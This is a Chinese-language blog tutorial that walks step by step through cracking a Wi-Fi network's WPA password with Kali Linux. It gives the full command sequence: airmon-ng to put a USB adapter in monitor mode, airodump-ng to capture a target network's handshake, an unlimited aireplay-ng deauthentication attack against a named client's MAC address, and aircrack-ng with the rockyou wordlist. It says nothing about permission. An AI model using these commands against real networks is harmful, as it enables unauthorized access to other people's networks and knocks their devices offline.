利用KALI暴力破解WIFI密碼
阿新 • • 發佈:2021-01-19
0x01 準備工作
利用kali破解wifi密碼,需要在虛擬機器裡安裝kali系統,併購買一個支援監聽的外接USB網絡卡!
0x02 開始
插入usb網絡卡並檢視
開啟kali虛擬機器,插入usb無線網絡卡,選擇連線kali虛擬機器
開啟終端輸入:
iwconfig
檢視無線網絡卡
airmon-n
該命令列出了支援監控模式的無線網絡卡,如果沒有任何輸出,則表示無線網絡卡不支援監控模式。
記下Interface名稱,開啟網絡卡的監聽模式
airmon-ng start wlan0
如果出現結果如下圖,說明還有其他網絡卡處於監聽狀態,需要先將其關閉
airmon-ng check kill
再次開啟監聽模式,並記下其Interface
airmon-ng start wlan0
掃描訊號
掃描附近的wifi訊號
airodump-ng wlan0mon
找到自己的目標wifi後使用 Ctrl+c 中止
- BSSID AP端的mac地址
- PWR 訊號強度(絕對值越小,訊號越強)
- Data 對應路由器的線上資料吞吐量,數值越大,數值上傳量越大
- CH 對應路由的頻道
- ESSID 對應路由器的名稱
抓取握手包
輸入命令:
airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon airodump-ng -c <AP通道> -w <抓取握手包後存放位置名稱> --bssid <AP的mac地址> <interface名稱>
這裡需要有裝置與路由傳輸資料才可以。
解除認證攻擊
保持命令視窗處於執行狀態,再開啟一個新的命令視窗,進行解除認證攻擊,即強制連線到目的wifi路由的裝置重新連線。
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon aireplay-ng -<攻擊模式,這裡使用持續攻擊(0)> [攻擊次數,0為無限攻擊] -a <AP端的MAC地址> -c <被攻擊裝置的MAC地址> <interface名稱>
當下圖所示位置顯示 WPA hankshake 即成功抓到握手包,將兩個命令框都輸入 Ctrl + C 終止攻擊和握手抓包。
關閉無線網絡卡監聽模式
airmon-ng stop wlan0mon
0x03 使用字典暴力破解
kali自帶有一份無線wifi密碼字典,但是需要先解壓
gzip -d /usr/share/wordlists/rockyou.txt.gz
爆破
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
aircrack-ng -w <指定字典> -b <目的路由MAC地址> <握手包>
爆破成功後,如圖區域會顯示 KEY FOUND![ 密碼 ]
大功告成!!!